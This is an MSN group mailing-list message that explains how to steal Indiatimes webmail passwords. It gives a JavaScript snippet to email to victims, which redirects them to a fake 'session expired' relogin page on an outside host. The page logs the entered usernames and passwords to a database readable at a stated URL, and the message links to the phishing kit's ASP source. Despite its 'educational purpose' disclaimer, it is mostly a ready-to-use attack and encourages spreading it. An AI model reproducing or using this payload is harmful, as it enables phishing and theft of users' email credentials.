----------------------------------------------------------- New Message on BDOTNET
----------------------------------------------------------- From: sharath_av Message 1 in Discussion Hi, All you have to do to get an Indiatimes users password is send the below JavaScript to the user as an Email. <script language="JavaScript"> document.location= "http://bb.1asphost.com/indiatimes/Indiatimes.htm"; </script> When the user would have checked this mail, You can see that users Username and Password in the following URL: http://bb.1asphost.com/indiatimes/display.asp How this works: There is a bug in Indiatimes email service that most of the users are not aware of. The bug is that the Indiatimes email service supports JavaScript in Email. This means if we write a code in JavaScript and send it as a mail to any Indiatimes user, the script runs as soon as the user opens his email. The user cannot even read the JavaScript. What my JavaScript code does is just redirect webpage it to a modified version of "Relogin Page" of Indiatimes. When the user opens the email with this JavaScript, the script runs and the user gets a web page saying "Your login session is expired, Please Relogin" Now when the user enters his Username & Password in this page and submits, It actually runs a ASP script and logs the Username and Password in an MS-Access database. The user gets a message saying "Indiatimes server is down, Please try again later" which is a dummy message. So when the user would have checked his/her mail, You can see his/her password in the following URL: http://bb.1asphost.com/indiatimes/display.asp You can download the ASP source for this from: http://www.geocities.com/avsharath/indiatimes.zip I'm sending message for Educational purpose and to make you people aware of this bug in Indiatimes email service. Warning: DO NOT USE THIS WITH BAD INTENTIONS TO INVADE OTHERS PERSONAL MAILS. I had informed the Indiatimes about this bug long back but they haven't taken any action yet to remove the bug. So do spread this message to your friends. Sharath A.V (BMSIT) ----------------------------------------------------------- To stop getting this e-mail, or change how often it arrives, go to your E-mail Settings. http://groups.msn.com/bdotnet/_emailsettings.msnw Need help? If you've forgotten your password, please go to Passport Member Services. http://groups.msn.com/_passportredir.msnw?ppmprop=help For other questions or feedback, go to our Contact Us page. http://groups.msn.com/contact If you do not want to receive future e-mail from this MSN group, or if you received this message by mistake, please click the "Remove" link below. On the pre-addressed e-mail message that opens, simply click "Send". Your e-mail address will be deleted from this group's mailing list. mailto:[EMAIL PROTECTED]
